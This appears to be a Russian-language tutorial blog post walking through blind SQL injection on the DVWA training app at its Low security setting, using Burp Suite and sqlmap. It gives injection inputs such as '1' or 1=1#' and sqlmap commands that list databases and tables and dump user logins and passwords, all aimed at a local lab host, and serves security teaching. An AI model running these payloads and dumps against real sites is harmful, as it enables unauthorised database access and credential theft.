Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимость DVWA, которая называется SQL-Injection (Blind) на низком уровне настроек безопасности.
Для начала выставим настройки на уровень «Low»:
Переходим на вкладку «SQL-Injection (Blind)», и видим поле для ввода данных:
Попробуем протестировать данное поле, введя цифру 1:
Получаем вывод информации по ID, которую мы вводили. Вывод на странице говорит о том, что данная запись существует в базе данных.
Давайте дальше тестировать, и, в дополнение к цифре 1, добавим кавычку:
Запись отсутствует в базе данных.
Теперь протестируем немного по сложнее конструкцию, которая выглядит как: «1’ or 1=1#»:
Итак, ID существует в базе данных.
Для дальнейшей работы нам понадобится sqlmap, и BurpSuite.
Коннектим Burp с браузером:
Для настройки браузера с Burp, я использую плагин FoxyProxy:
Вводим цифру «1», и нас автоматически перебрасывает в BrupSuite:
Открываем терминал, и вводим следующую команду: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” --dbs »:
В итоге мы получили наименование актуальных баз данных.
Давайте посмотрим содержимое базы «dvwa». Команда останется такая же, за исключением дополнительных параметров: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa --tables»:
По итогу работы скрипта получаем вывод:
Отлично! Мы получили две таблицы. Это «guestbook», и «users».
Продолжаем тестировать базу данных, и добавим несколько параметров в команду: «http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit“ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa –T users --column»:
Получаем 8 колонок, с разными значениями. Зная данные колонки, мы можем сдампить содержимое любой выбранной колонки. Для наглядности возьмем «user», и «password».
Команда выглядит как: «http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa –T users –C user,password --dump»:
Отлично. Мы получили логины и пароли пользователей.
На этом все. Всем хорошего дня!